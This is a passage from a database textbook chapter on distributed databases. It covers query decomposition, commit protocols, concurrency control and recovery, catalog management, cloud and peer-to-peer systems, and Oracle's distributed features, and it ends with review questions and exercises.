Q: SELECT Fname, Lname, Hours
FROM EMPLOYEE, PROJECT, WORKS_ON
WHERE Dnum=5 AND Pnumber=Pno AND Essn=Ssn;

906

Distributed Databases

Suppose that the query is submitted at site 2, which is where the query result will be
needed. The DDBMS can determine from the guard condition on PROJS5 and
WORKS_ON5 that all tuples satisfying the conditions (Dnum = 5 AND Pnumber =
Pno) reside at site 2. Hence, it may decompose the query into the following rela-
tional algebra subqueries:

T1 ← πEssn(PROJS5 Pnumber=PnoWORKS_ON5)
T2 ← πEssn, Fname, Lname(T1 Essn=SsnEMPLOYEE)
RESULT ← πFname, Lname, Hours(T2 * WORKS_ON5)

This decomposition can be used to execute the query by using a semijoin strategy.
The DDBMS knows from the guard conditions that PROJS5 contains exactly those
tuples satisfying (Dnum = 5) and that WORKS_ON5 contains all tuples to be joined
with PROJS5; hence, subquery T1 can be executed at site 2, and the projected column
Essn can be sent to site 1. Subquery T2 can then be executed at site 1, and the result
can be sent back to site 2, where the final query result is calculated and displayed to
the user. An alternative strategy would be to send the query Q itself to site 1, which
includes all the database tuples, where it would be executed locally and from which
the result would be sent back to site 2. The query optimizer would estimate the costs
of both strategies and would choose the one with the lower cost estimate.

6 Overview of Transaction Management
in Distributed Databases

The global and local transaction management software modules, along with the
concurrency control and recovery manager of a DDBMS, collectively guarantee the
ACID properties of transactions. We discuss distributed transaction management in
this section and explore concurrency control in Section 7.

As can be seen in Figure 5, an additional component called the global transaction
manager is introduced for supporting distributed transactions. The site where the
transaction originated can temporarily assume the role of global transaction man-
ager and coordinate the execution of database operations with transaction man-
agers across multiple sites. Transaction managers export their functionality as an
interface to the application programs. The manager stores bookkeeping informa-
tion related to each transaction, such as a unique identifier, originating site, name,
and so on. For READ operations, it returns a local copy if valid and available. For
WRITE operations, it ensures that updates are visible across all sites containing
copies (replicas) of the data item. For ABORT operations, the manager ensures that
no effects of the transaction are reflected in any site of the distributed database. For
COMMIT operations, it ensures that the effects of a write are persistently recorded on
all databases containing copies of the data item. Atomic termination (COMMIT/
ABORT) of distributed transactions is commonly implemented using the two-phase
commit protocol. We give more details of this protocol in the following section.

907

Distributed Databases

The transaction manager passes to the concurrency controller the database opera-
tion and associated information. The controller is responsible for acquisition and
release of associated locks. If the transaction requires access to a locked resource, it
is delayed until the lock is acquired. Once the lock is acquired, the operation is sent
to the runtime processor, which handles the actual execution of the database opera-
tion. Once the operation is completed, locks are released and the transaction man-
ager is updated with the result of the operation. We discuss commonly used
distributed concurrency methods in Section 7.

6.1 Two-Phase Commit Protocol
The two-phase commit protocol (2PC) requires a global recovery manager, or
coordinator, to maintain information needed for recovery, in addition to the local
recovery managers and the information they maintain (log, tables). The two-phase
commit protocol has certain drawbacks that led to the development of the three-
phase commit protocol, which we discuss next.

6.2 Three-Phase Commit Protocol
The biggest drawback of 2PC is that it is a blocking protocol. Failure of the coordi-
nator blocks all participating sites, causing them to wait until the coordinator recov-
ers. This can cause performance degradation, especially if participants are holding
locks to shared resources. Another problematic scenario is when both the coordina-
tor and a participant that has committed crash together. In the two-phase commit
protocol, a participant has no way to ensure that all participants got the commit
message in the second phase. Hence once a decision to commit has been made by
the coordinator in the first phase, participants will commit their transactions in the
second phase independent of receipt of a global commit message by other partici-
pants. Thus, in the situation that both the coordinator and a committed participant
crash together, the result of the transaction becomes uncertain or nondeterministic.
Since the transaction has already been committed by one participant, it cannot be
aborted on recovery by the coordinator. Also, the transaction cannot be optimisti-
cally committed on recovery since the original vote of the coordinator may have
been to abort.

These problems are solved by the three-phase commit (3PC) protocol, which essen-
tially divides the second commit phase into two subphases called prepare-to-
commit and commit. The prepare-to-commit phase is used to communicate the
result of the vote phase to all participants. If all participants vote yes, then the coordi-
nator instructs them to move into the prepare-to-commit state. The commit subphase
is identical to its two-phase counterpart. Now, if the coordinator crashes during this
subphase, another participant can see the transaction through to completion. It can
simply ask a crashed participant if it received a prepare-to-commit message. If it did
not, then it safely assumes to abort. Thus the state of the protocol can be recovered
irrespective of which participant crashes. Also, by limiting the time required for a
transaction to commit or abort to a maximum time-out period, the protocol ensures
that a transaction attempting to commit via 3PC releases locks on time-out.

908

Distributed Databases

The main idea is to limit the wait time for participants who have committed and are
waiting for a global commit or abort from the coordinator. When a participant
receives a precommit message, it knows that the rest of the participants have voted
to commit. If a precommit message has not been received, then the participant will
abort and release all locks.

6.3 Operating System Support
for Transaction Management

The following are the main benefits of operating system (OS)-supported transac-
tion management:

■ Typically, DBMSs use their own semaphores9 to guarantee mutually exclu-
sive access to shared resources. Since these semaphores are implemented in
userspace at the level of the DBMS application software, the OS has no
knowledge about them. Hence if the OS deactivates a DBMS process holding
a lock, other DBMS processes wanting this lock resource get queued. Such a
situation can cause serious performance degradation. OS-level knowledge of
semaphores can help eliminate such situations.

■ Specialized hardware support for locking can be exploited to reduce associ-
ated costs. This can be of great importance, since locking is one of the most
common DBMS operations.

■ Providing a set of common transaction support operations though the ker-
nel allows application developers to focus on adding new features to their
products as opposed to reimplementing the common functionality for each
application. For example, if different DDBMSs are to coexist on the same
machine and they chose the two-phase commit protocol, then it is more
beneficial to have this protocol implemented as part of the kernel so that
the DDBMS developers can focus more on adding new features to their
products.

7 Overview of Concurrency Control
and Recovery in Distributed Databases

For concurrency control and recovery purposes, numerous problems arise in a dis-
tributed DBMS environment that are not encountered in a centralized DBMS envi-
ronment. These include the following:

■ Dealing with multiple copies of the data items. The concurrency control
method is responsible for maintaining consistency among these copies. The
recovery method is responsible for making a copy consistent with other
copies if the site on which the copy is stored fails and recovers later.

9Semaphores are data structures used for synchronized and exclusive access to shared resources for
preventing race conditions in a parallel computing system.

909

Distributed Databases

■ Failure of individual sites. The DDBMS should continue to operate with its
running sites, if possible, when one or more individual sites fail. When a site
recovers, its local database must be brought up-to-date with the rest of the
sites before it rejoins the system.

■ Failure of communication links. The system must be able to deal with the
failure of one or more of the communication links that connect the sites. An
extreme case of this problem is that network partitioning may occur. This
breaks up the sites into two or more partitions, where the sites within each
partition can communicate only with one another and not with sites in other
partitions.

■ Distributed commit. Problems can arise with committing a transaction that
is accessing databases stored on multiple sites if some sites fail during the
commit process. The two-phase commit protocol is often used to deal with
this problem.

■ Distributed deadlock. Deadlock may occur among several sites, so tech-
niques for dealing with deadlocks must be extended to take this into
account.

Distributed concurrency control and recovery techniques must deal with these and
other problems. In the following subsections, we review some of the techniques that
have been suggested to deal with recovery and concurrency control in DDBMSs.

7.1 Distributed Concurrency Control Based
on a Distinguished Copy of a Data Item

To deal with replicated data items in a distributed database, a number of concur-
rency control methods have been proposed that extend the concurrency control
techniques for centralized databases. We discuss these techniques in the context of
extending centralized locking. Similar extensions apply to other concurrency control
techniques. The idea is to designate a particular copy of each data item as a
distinguished copy. The locks for this data item are associated with the distin-
guished copy, and all locking and unlocking requests are sent to the site that contains
that copy.

A number of different methods are based on this idea, but they differ in their
method of choosing the distinguished copies. In the primary site technique, all dis-
tinguished copies are kept at the same site. A modification of this approach is the
primary site with a backup site. Another approach is the primary copy method,
where the distinguished copies of the various data items can be stored in different
sites. A site that includes a distinguished copy of a data item basically acts as the
coordinator site for concurrency control on that item. We discuss these techniques
next.

Primary Site Technique. In this method a single primary site is designated to be
the coordinator site for all database items. Hence, all locks are kept at that site, and
all requests for locking or unlocking are sent there. This method is thus an extension

910

Distributed Databases

of the centralized locking approach. For example, if all transactions follow the two-
phase locking protocol, serializability is guaranteed. The advantage of this approach
is that it is a simple extension of the centralized approach and thus is not overly
complex. However, it has certain inherent disadvantages. One is that all locking
requests are sent to a single site, possibly overloading that site and causing a system
bottleneck. A second disadvantage is that failure of the primary site paralyzes the
system, since all locking information is kept at that site. This can limit system relia-
bility and availability.

Although all locks are accessed at the primary site, the items themselves can be
accessed at any site at which they reside. For example, once a transaction obtains a
Read_lock on a data item from the primary site, it can access any copy of that data
item. However, once a transaction obtains a Write_lock and updates a data item, the
DDBMS is responsible for updating all copies of the data item before releasing the
lock.

Primary Site with Backup Site. This approach addresses the second disadvantage
of the primary site method by designating a second site to be a backup site. All lock-
ing information is maintained at both the primary and the backup sites. In case of
primary site failure, the backup site takes over as the primary site, and a new backup
site is chosen. This simplifies the process of recovery from failure of the primary site,
since the backup site takes over and processing can resume after a new backup site is
chosen and the lock status information is copied to that site. It slows down the
process of acquiring locks, however, because all lock requests and granting of locks
must be recorded at both the primary and the backup sites before a response is sent to
the requesting transaction. The problem of the primary and backup sites becoming
overloaded with requests and slowing down the system remains undiminished.

Primary Copy Technique. This method attempts to distribute the load of lock
coordination among various sites by having the distinguished copies of different
data items stored at different sites. Failure of one site affects any transactions that are
accessing locks on items whose primary copies reside at that site, but other transac-
tions are not affected. This method can also use backup sites to enhance reliability
and availability.

Choosing a New Coordinator Site in Case of Failure. Whenever a coordina-
tor site fails in any of the preceding techniques, the sites that are still running must
choose a new coordinator. In the case of the primary site approach with no backup
site, all executing transactions must be aborted and restarted in a tedious recovery
process. Part of the recovery process involves choosing a new primary site and creat-
ing a lock manager process and a record of all lock information at that site. For
methods that use backup sites, transaction processing is suspended while the
backup site is designated as the new primary site and a new backup site is chosen
and is sent copies of all the locking information from the new primary site.

If a backup site X is about to become the new primary site, X can choose the new
backup site from among the system’s running sites. However, if no backup site

911

Distributed Databases

existed, or if both the primary and the backup sites are down, a process called
election can be used to choose the new coordinator site. In this process, any site Y
that attempts to communicate with the coordinator site repeatedly and fails to do so
can assume that the coordinator is down and can start the election process by send-
ing a message to all running sites proposing that Y become the new coordinator. As
soon as Y receives a majority of yes votes, Y can declare that it is the new coordina-
tor. The election algorithm itself is quite complex, but this is the main idea behind
the election method. The algorithm also resolves any attempt by two or more sites
to become coordinator at the same time. The references in the Selected Bibliography
at the end of this chapter discuss the process in detail.

7.2 Distributed Concurrency Control Based on Voting
The concurrency control methods for replicated items discussed earlier all use the
idea of a distinguished copy that maintains the locks for that item. In the voting
method, there is no distinguished copy; rather, a lock request is sent to all sites that
includes a copy of the data item. Each copy maintains its own lock and can grant or
deny the request for it. If a transaction that requests a lock is granted that lock by a
majority of the copies, it holds the lock and informs all copies that it has been
granted the lock. If a transaction does not receive a majority of votes granting it a
lock within a certain time-out period, it cancels its request and informs all sites of
the cancellation.

The voting method is considered a truly distributed concurrency control method,
since the responsibility for a decision resides with all the sites involved. Simulation
studies have shown that voting has higher message traffic among sites than do the
distinguished copy methods. If the algorithm takes into account possible site fail-
ures during the voting process, it becomes extremely complex.

7.3 Distributed Recovery
The recovery process in distributed databases is quite involved. We give only a very
brief idea of some of the issues here. In some cases it is quite difficult even to deter-
mine whether a site is down without exchanging numerous messages with other
sites. For example, suppose that site X sends a message to site Y and expects a
response from Y but does not receive it. There are several possible explanations:

■ The message was not delivered to Y because of communication failure.

■ Site Y is down and could not respond.

■ Site Y is running and sent a response, but the response was not delivered.

Without additional information or the sending of additional messages, it is difficult
to determine what actually happened.

Another problem with distributed recovery is distributed commit. When a transac-
tion is updating data at several sites, it cannot commit until it is sure that the effect
of the transaction on every site cannot be lost. This means that every site must first

912

Distributed Databases

have recorded the local effects of the transactions permanently in the local site log
on disk. The two-phase commit protocol is often used to ensure the correctness of
distributed commit.

8 Distributed Catalog Management
Efficient catalog management in distributed databases is critical to ensure satisfac-
tory performance related to site autonomy, view management, and data distribution
and replication. Catalogs are databases themselves containing metadata about the
distributed database system.

Three popular management schemes for distributed catalogs are centralized cata-
logs, fully replicated catalogs, and partitioned catalogs. The choice of the scheme
depends on the database itself as well as the access patterns of the applications to the
underlying data.

Centralized Catalogs. In this scheme, the entire catalog is stored in one single
site. Owing to its central nature, it is easy to implement. On the other hand, the
advantages of reliability, availability, autonomy, and distribution of processing load
are adversely impacted. For read operations from noncentral sites, the requested
catalog data is locked at the central site and is then sent to the requesting site. On
completion of the read operation, an acknowledgement is sent to the central site,
which in turn unlocks this data. All update operations must be processed through
the central site. This can quickly become a performance bottleneck for write-
intensive applications.

Fully Replicated Catalogs. In this scheme, identical copies of the complete cata-
log are present at each site. This scheme facilitates faster reads by allowing them to
be answered locally. However, all updates must be broadcast to all sites. Updates are
treated as transactions and a centralized two-phase commit scheme is employed to
ensure catalog consitency. As with the centralized scheme, write-intensive applica-
tions may cause increased network traffic due to the broadcast associated with the
writes.

Partially Replicated Catalogs. The centralized and fully replicated schemes
restrict site autonomy since they must ensure a consistent global view of the catalog.
Under the partially replicated scheme, each site maintains complete catalog infor-
mation on data stored locally at that site. Each site is also permitted to cache entries
retrieved from remote sites. However, there are no guarantees that these cached
copies will be the most recent and updated. The system tracks catalog entries for
sites where the object was created and for sites that contain copies of this object. Any
changes to copies are propagated immediately to the original (birth) site. Retrieving
updated copies to replace stale data may be delayed until an access to this data
occurs. In general, fragments of relations across sites should be uniquely accessible.
Also, to ensure data distribution transparency, users should be allowed to create
synonyms for remote objects and use these synonyms for subsequent referrals.

913

Distributed Databases

9 Current Trends in Distributed Databases
Current trends in distributed data management are centered on the Internet, in
which petabytes of data can be managed in a scalable, dynamic, and reliable fashion.
Two important areas in this direction are cloud computing and peer-to-peer data-
bases.

9.1 Cloud Computing
Cloud computing is the paradigm of offering computer infrastructure, platforms,
and software as services over the Internet. It offers significant economic advantages
by limiting both up-front capital investments toward computer infrastructure as
well as total cost of ownership. It has introduced a new challenge of managing
petabytes of data in a scalable fashion. Traditional database systems for managing
enterprise data proved to be inadequate in handling this challenge, which has
resulted in a major architectural revision. The Claremont report10 by a group of
senior database researchers envisions that future research in cloud computing will
result in the emergence of new data management architectures and the interplay of
structured and unstructured data as well as other developments.

Performance costs associated with partial failures and global synchronization were
key performance bottlenecks of traditional database solutions. The key insight is
that the hash-value nature of the underlying datasets used by these organizations
lends itself naturally to partitioning. For instance, search queries essentially involve
a recursive process of mapping keywords to a set of related documents, which can
benefit from such a partitioning. Also, the partitions can be treated independently,
thereby eliminating the need for a coordinated commit. Another problem with tra-
ditional DDBMSs is the lack of support for efficient dynamic partitioning of data,
which limited scalability and resource utilization. Traditional systems treated sys-
tem metadata and application data alike, with the system data requiring strict con-
sistency and availability guarantees. But application data has variable requirements
on these characteristics, depending on its nature. For example, while a search engine
can afford weaker consistency guarantees, an online text editor like Google Docs,
which allows concurrent users, has strict consistency requirements.

The metadata of a distributed database system should be decoupled from its actual
data in order to ensure scalability. This decoupling can be used to develop innova-
tive solutions to manage the actual data by exploiting their inherent suitability to
partitioning and using traditional database solutions to manage critical system
metadata. Since metadata is only a fraction of the total data set, it does not prove to
be a performance bottleneck. Single object semantics of these implementations
enables higher tolerance to nonavailability of certain sections of data. Access to data
is typically by a single object in an atomic fashion. Hence, transaction support to
such data is not as stringent as for traditional databases.11 There is a varied set of

10“The Claremont Report on Database Research” is available at http://db.cs.berkeley.edu/claremont/
claremontreport08.pdf.
11Readers may refer to the work done by Das et al. (2008) for further details.

914

Distributed Databases

cloud services available today, including application services (salesforce.com), stor-
age services (Amazon Simple Storage Service, or Amazon S3), compute services
(Google App Engine, Amazon Elastic Compute Cloud—Amazon EC2), and data
services (Amazon SimpleDB, Microsoft SQL Server Data Services, Google’s
Datastore). More and more data-centric applications are expected to leverage data
services in the cloud. While most current cloud services are data-analysis intensive,
it is expected that business logic will eventually be migrated to the cloud. The key
challenge in this migration would be to ensure the scalability advantages for multi-
ple object semantics inherent to business logic. For a detailed treatment of cloud
computing, refer to the relevant bibliographic references in this chapter’s Selected
Bibliography.

9.2 Peer-to-Peer Database Systems
A peer-to-peer database system (PDBS) aims to integrate advantages of P2P (peer-
to-peer) computing, such as scalability, attack resilience, and self-organization, with
the features of decentralized data management. Nodes are autonomous and are
linked only to a small number of peers individually. It is permissible for a node to
behave purely as a collection of files without offering a complete set of traditional
DBMS functionality. While FDBS and MDBS mandate the existence of mappings
between local and global federated schemas, PDBSs attempt to avoid a global
schema by providing mappings between pairs of information sources. In PDBS,
each peer potentially models semantically related data in a manner different from
other peers, and hence the task of constructing a central mediated schema can be
very challenging. PDBSs aim to decentralize data sharing. Each peer has a schema
associated with its domain-specific stored data. The PDBS constructs a semantic
path12 of mappings between peer schemas. Using this path, a peer to which a query
has been submitted can obtain information from any relevant peer connected
through this path. In multidatabase systems, a separate global query processor is
used, whereas in a P2P system a query is shipped from one peer to another until it is
processed completely. A query submitted to a node may be forwarded to others
based on the mapping graph of semantic paths. Edutella and Piazza are examples of
PDBSs. Details of these systems can be found from the sources mentioned in this
chapter’s Selected Bibliography.

10 Distributed Databases in Oracle13

Oracle provides support for homogeneous, heterogeneous, and client server archi-
tectures of distributed databases. In a homogeneous architecture, a minimum of
two Oracle databases reside on at least one machine. Although the location and
platform of the databases are transparent to client applications, they would need to

12A semantic path describes the higher-level relationship between two domains that are dissimilar but
not unrelated.
13The discussion is based on available documentation at http://docs.oracle.com.

915

Distributed Databases

distinguish between local and remote objects semantically. Using synonyms, this
need can be overcome wherein users can access the remote objects with the same
syntax as local objects. Different versions of DBMSs can be used, although it must
be noted that Oracle offers backward compatibility but not forward compatibility
between its versions. For example, it is possible that some of the SQL extensions that
were incorporated into Oracle 11i may not be understood by Oracle 9.

In a heterogeneous architecture, at least one of the databases in the network is a
non-Oracle system. The Oracle database local to the application hides the underly-
ing heterogeneity and offers the view of a single local, underlying Oracle database.
Connectivity is handled by use of an ODBC- or OLE-DB-compliant protocol or by
Oracle’s Heterogeneous Services and Transparent Gateway agent components. A
discussion of the Heterogeneous Services and Transparent Gateway agents is
beyond the scope of this text, and the reader is advised to consult the online Oracle
documentation.

In the client-server architecture, the Oracle database system is divided into two
parts: a front end as the client portion, and a back end as the server portion. The
client portion is the front-end database application that interacts with the user. The
client has no data access responsibility and merely handles the requesting, process-
ing, and presentation of data managed by the server. The server portion runs Oracle
and handles the functions related to concurrent shared access. It accepts SQL and
PL/SQL statements originating from client applications, processes them, and sends
the results back to the client. Oracle client-server applications provide location
transparency by making the location of data transparent to users; several features
like views, synonyms, and procedures contribute to this. Global naming is achieved
by using to refer to tables uniquely.

Oracle uses a two-phase commit protocol to deal with concurrent distributed trans-
actions. The COMMIT statement triggers the two-phase commit mechanism. The
RECO (recoverer) background process automatically resolves the outcome of those
distributed transactions in which the commit was interrupted. The RECO of each
local Oracle server automatically commits or rolls back any in-doubt distributed
transactions consistently on all involved nodes. For long-term failures, Oracle
allows each local DBA to manually commit or roll back any in-doubt transactions
and free up resources. Global consistency can be maintained by restoring the data-
base at each site to a predetermined fixed point in the past.

Oracle’s distributed database architecture is shown in Figure 12. A node in a distrib-
uted database system can act as a client, as a server, or both, depending on the situa-
tion. The figure shows two sites where databases called HQ (headquarters) and Sales
are kept. For example, in the application shown running at the headquarters, for an
SQL statement issued against local data (for example, DELETE FROM DEPT …), the
HQ computer acts as a server, whereas for a statement against remote data (for
example, INSERT INTO EMP@SALES), the HQ computer acts as a client.

Communication in such a distributed heterogeneous environment is facilitated
through Oracle Net Services, which supports standard network protocols and APIs.
Under Oracle’s client-server implementation of distributed databases, Net Services

916

Distributed Databases

Server

DEPT Table

Application

HQ
Database

Connect to . . .
Identified by . . .

Oracle
Net

EMP Table

Sales
Database

Transaction

.

.

.

Network

INSERT INTO EMP@SALES . . . ;

DELETE FROM DEPT . . . ;

SELECT . . .
FROM EMP@SALES . . . ;

COMMIT;

Server

Oracle
Net

Database Link

Figure 12
Oracle distributed database system.

Source: From Oracle (2008). Copyright ©
Oracle Corporation 2008. All rights reserved.

is responsible for establishing and managing connections between a client applica-
tion and database server. It is present in each node on the network running an
Oracle client application, database server, or both. It packages SQL statements into
one of the many communication protocols to facilitate client-to-server communi-
cation and then packages the results back similarly to the client. The support offered
by Net Services to heterogeneity refers to platform specifications only and not the
database software. Support for DBMSs other than Oracle is through Oracle’s
Heterogeneous Services and Transparent Gateway. Each database has a unique
global name provided by a hierarchical arrangement of network domain names that
is prefixed to the database name to make it unique.

Oracle supports database links that define a one-way communication path from
one Oracle database to another. For example,

CREATE DATABASE LINK sales.us.americas;

917

Distributed Databases

establishes a connection to the sales database in Figure 12 under the network
domain us that comes under domain americas. Using links, a user can access a
remote object on another database subject to ownership rights without the need for
being a user on the remote database.

Data in an Oracle DDBS can be replicated using snapshots or replicated master
tables. Replication is provided at the following levels:

■ Basic replication. Replicas of tables are managed for read-only access. For
updates, data must be accessed at a single primary site.

■ Advanced (symmetric) replication. This extends beyond basic replication
by allowing applications to update table replicas throughout a replicated
DDBS. Data can be read and updated at any site. This requires additional
software called Oracle’s advanced replication option. A snapshot generates a
copy of a part of the table by means of a query called the snapshot defining
query. A simple snapshot definition looks like this:

CREATE SNAPSHOT SALES_ORDERS AS
SELECT * FROM .americas;

Oracle groups snapshots into refresh groups. By specifying a refresh interval, the
snapshot is automatically refreshed periodically at that interval by up to ten
Snapshot Refresh Processes (SNPs). If the defining query of a snapshot contains a
distinct or aggregate function, a GROUP BY or CONNECT BY clause, or join or set
operations, the snapshot is termed a complex snapshot and requires additional
processing. Oracle (up to version 7.3) also supports ROWID snapshots that are
based on physical row identifiers of rows in the master table.

Heterogeneous Databases in Oracle. In a heterogeneous DDBS, at least one
database is a non-Oracle system. Oracle Open Gateways provides access to a non-
Oracle database from an Oracle server, which uses a database link to access data or
to execute remote procedures in the non-Oracle system. The Open Gateways feature
includes the following:

■ Distributed transactions. Under the two-phase commit mechanism, trans-
actions may span Oracle and non-Oracle systems.

■ Transparent SQL access. SQL statements issued by an application are trans-
parently transformed into SQL statements understood by the non-Oracle
system.

■ Pass-through SQL and stored procedures. An application can directly
access a non-Oracle system using that system’s version of SQL. Stored proce-
dures in a non-Oracle SQL-based system are treated as if they were PL/SQL
remote procedures.

■ Global query optimization. Cardinality information, indexes, and so on at
the non-Oracle system are accounted for by the Oracle server query opti-
mizer to perform global query optimization.

■ Procedural access. Procedural systems like messaging or queuing systems
are accessed by the Oracle server using PL/SQL remote procedure calls.

918

Distributed Databases

In addition to the above, data dictionary references are translated to make the non-
Oracle data dictionary appear as a part of the Oracle server’s dictionary. Character
set translations are done between national language character sets to connect multi-
lingual databases.

From a security perspective, Oracle recommends that if a query originates at site A
and accesses sites B, C, and D, then the auditing of links should be done in the data-
base at site A only. This is because the remote databases cannot distinguish whether
a successful connection request and following SQL statements are coming from
another server or a locally connected client.

10.1 Directory Services
A concept closely related with distributed enterprise systems is online directories.
Online directories are essentially a structured organization of metadata needed for
management functions. They can represent information about a variety of sources
ranging from security credentials, shared network resources, and database catalog.
Lightweight Directory Access Protocol (LDAP) is an industry standard protocol
for directory services. LDAP enables the use of a partitioned Directory
Information Tree (DIT) across multiple LDAP servers, which in turn can return
references to other servers as a result of a directory query. Online directories and
LDAP are particularly important in distributed databases, wherein access of meta-
data related to transparencies discussed in Section 1 must be scalable, secure, and
highly available.

Oracle supports LDAP Version 3 and online directories through Oracle Internet
Directory, a general-purpose directory service for fast access and centralized man-
agement of metadata pertaining to distributed network resources and users. It runs
as an application on an Oracle database and communicates with the database
through Oracle Net Services. It also provides password-based, anonymous, and
certificate-based user authentication using SSL Version 3.

Figure 13 illustrates the architecture of the Oracle Internet Directory. The main
components are:

■ Oracle directory server. Handles client requests and updates for informa-
tion pertaining to people and resources.

■ Oracle directory replication server. Stores a copy of the LDAP data from
Oracle directory servers as a backup.

■ Directory administrator: Supports both GUI-based and command line-
based interfaces for directory administration.

11 Summary
In this chapter we provided an introduction to distributed databases. This is a very
broad topic, and we discussed only some of the basic techniques used with distrib-
uted databases. First we discussed the reasons for distribution and the potential
advantages of distributed databases over centralized systems. Then the concept of

919

Distributed Databases

Oracle
Application

Server
Database

Oracle Net
Connections

Oracle
Directory
Replication
Server

Oracle
Directory
ServerLDAP over SSL

LDAP Clients

Directory
Administration

Figure 13
Oracle Internet Directory overview.

Source: From Oracle (2005). Copyright ©
Oracle Corporation 2005. All rights reserved.

distribution transparency and the related concepts of fragmentation transparency
and replication transparency were defined. We categorized DDBMSs by using crite-
ria such as the degree of homogeneity of software modules and the degree of local
autonomy. We distinguished between parallel and distributed system architectures
and then introduced the generic architecture of distributed databases from both a
component as well as a schematic architectural perspective. The issues of federated
database management were then discussed in some detail, focusing on the needs of
supporting various types of autonomies and dealing with semantic heterogeneity.
We also reviewed the client-server architecture concepts and related them to distrib-
uted databases. We discussed the design issues related to data fragmentation, repli-
cation, and distribution, and we distinguished between horizontal and vertical
fragments of relations. The use of data replication to improve system reliability and
availability was then discussed. We illustrated some of the techniques used in dis-
tributed query processing and discussed the cost of communication among sites,
which is considered a major factor in distributed query optimization. The different
techniques for executing joins were compared and we then presented the semijoin
technique for joining relations that reside on different sites. Then we discussed
transaction management, including different commit protocols and operating sys-
tem support for transaction management. We briefly discussed the concurrency

920

Distributed Databases

control and recovery techniques used in DDBMSs, and then reviewed some of the
additional problems that must be dealt with in a distributed environment that do
not appear in a centralized environment. We reviewed catalog management in dis-
tributed databases and summarized their relative advantages and disadvantages. We
then introduced Cloud Computing and Peer to Peer Database Systems as new focus
areas in DDBs in response to the need of managing petabytes of information acces-
sible over the Internet today.

We described some of the facilities in Oracle to support distributed databases. We
also discussed online directories and the LDAP protocol in brief.

Review Questions
1. What are the main reasons for and potential advantages of distributed data-

bases?

2. What additional functions does a DDBMS have over a centralized DBMS?

3. Discuss what is meant by the following terms: degree of homogeneity of a
DDBMS, degree of local autonomy of a DDBMS, federated DBMS, distribution
transparency, fragmentation transparency, replication transparency,
multidatabase system.

4. Discuss the architecture of a DDBMS. Within the context of a centralized
DBMS, briefly explain new components introduced by the distribution of
data.

5. What are the main software modules of a DDBMS? Discuss the main func-
tions of each of these modules in the context of the client-server architec-
ture.

6. Compare the two-tier and three-tier client-server architectures.

7. What is a fragment of a relation? What are the main types of fragments? Why
is fragmentation a useful concept in distributed database design?

8. Why is data replication useful in DDBMSs? What typical units of data are
replicated?

9. What is meant by data allocation in distributed database design? What typi-
cal units of data are distributed over sites?

10. How is a horizontal partitioning of a relation specified? How can a relation
be put back together from a complete horizontal partitioning?

11. How is a vertical partitioning of a relation specified? How can a relation be
put back together from a complete vertical partitioning?

12. Discuss the naming problem in distributed databases.

13. What are the different stages of processing a query in a DDBMS?

14. Discuss the different techniques for executing an equijoin of two files located
at different sites. What main factors affect the cost of data transfer?

921

15. Discuss the semijoin method for executing an equijoin of two files located at
different sites. Under what conditions is an equijoin strategy efficient?

16. Discuss the factors that affect query decomposition. How are guard condi-
tions and attribute lists of fragments used during the query decomposition
process?

17. How is the decomposition of an update request different from the decompo-
sition of a query? How are guard conditions and attribute lists of fragments
used during the decomposition of an update request?

18. List the support offered by operating systems to a DDBMS and also their
benefits.

19. Discuss the factors that do not appear in centralized systems that affect con-
currency control and recovery in distributed systems.

20. Discuss the two-phase commit protocol used for transaction management in
a DDBMS. List its limitations and explain how they are overcome using the
three-phase commit protocol.

21. Compare the primary site method with the primary copy method for dis-
tributed concurrency control. How does the use of backup sites affect each?

22. When are voting and elections used in distributed databases?

23. Discuss catalog management in distributed databases.

24. What are the main challenges facing a traditional DDBMS in the context of
today’s Internet applications? How does cloud computing attempt to address
them?

25. Discuss briefly the support offered by Oracle for homogeneous, heteroge-
neous, and client-server based distributed database architectures.

26. Discuss briefly online directories, their management, and their role in dis-
tributed databases.

Exercises
27. Consider the data distribution of the COMPANY database, where the frag-

ments at sites 2 and 3 are as shown in Figure 9 and the fragments at site 1 are
as shown in Figure A.2. For each of the following queries, show at least two
strategies of decomposing and executing the query. Under what conditions
would each of your strategies work well?

a. For each employee in department 5, retrieve the employee name and the
names of the employee’s dependents.

b. Print the names of all employees who work in department 5 but who
work on some project not controlled by department 5.

Distributed Databases

922

28. Consider the following relations:

BOOKS(Book#, Primary_author, Topic, Total_stock, $price)
BOOKSTORE(Store#, City, State, Zip, Inventory_value)
STOCK(Store#, Book#, Qty)

Total_stock is the total number of books in stock and Inventory_value is the
total inventory value for the store in dollars.

a. Give an example of two simple predicates that would be meaningful for
the BOOKSTORE relation for horizontal partitioning.

b. How would a derived horizontal partitioning of STOCK be defined based
on the partitioning of BOOKSTORE?

c. Show predicates by which BOOKS may be horizontally partitioned by
topic.

d. Show how the STOCK may be further partitioned from the partitions in
(b) by adding the predicates in (c).

29. Consider a distributed database for a bookstore chain called National Books
with three sites called EAST, MIDDLE, and WEST. The relation schemas are
given in Exercise 28. Consider that BOOKS are fragmented by $price
amounts into:

B1: BOOK1: $price up to $20
B2: BOOK2: $price from $20.01 to $50
B3: BOOK3: $price from $50.01 to $100
B4: BOOK4: $price $100.01 and above

Similarly, BOOK_STORES are divided by ZIP Codes into:

S1: EAST: Zip up to 35000
S2: MIDDLE: Zip 35001 to 70000
S3: WEST: Zip 70001 to 99999

Assume that STOCK is a derived fragment based on BOOKSTORE only.

a. Consider the query:

SELECT Book#, Total_stock
FROM Books
WHERE $price > 15 AND $price < 55; Assume that fragments of BOOKSTORE are nonreplicated and assigned based on region. Assume further that BOOKS are allocated as: EAST: B1, B4 MIDDLE: B1, B2 WEST: B1, B2, B3, B4 Assuming the query was submitted in EAST, what remote subqueries does it generate? (Write in SQL.) b. If the price of Book#= 1234 is updated from $45 to $55 at site MIDDLE, what updates does that generate? Write in English and then in SQL. Distributed Databases 923 Distributed Databases c. Give a sample query issued at WEST that will generate a subquery for MIDDLE. d. Write a query involving selection and projection on the above relations and show two possible query trees that denote different ways of execu- tion. 30. Consider that you have been asked to propose a database architecture in a large organization (General Motors, for example) to consolidate all data including legacy databases (from hierarchical and network models; no spe- cific knowledge of these models is needed) as well as relational databases, which are geographically distributed so that global applications can be sup- ported. Assume that alternative one is to keep all databases as they are, while alternative two is to first convert them to relational and then support the applications over a distributed integrated database. a. Draw two schematic diagrams for the above alternatives showing the link- ages among appropriate schemas. For alternative one, choose the approach of providing export schemas for each database and construct- ing unified schemas for each application. b. List the steps that you would have to go through under each alternative from the present situation until global applications are viable. c. Compare these from the issues of: i. design time considerations ii. runtime considerations Selected Bibliography The textbooks by Ceri and 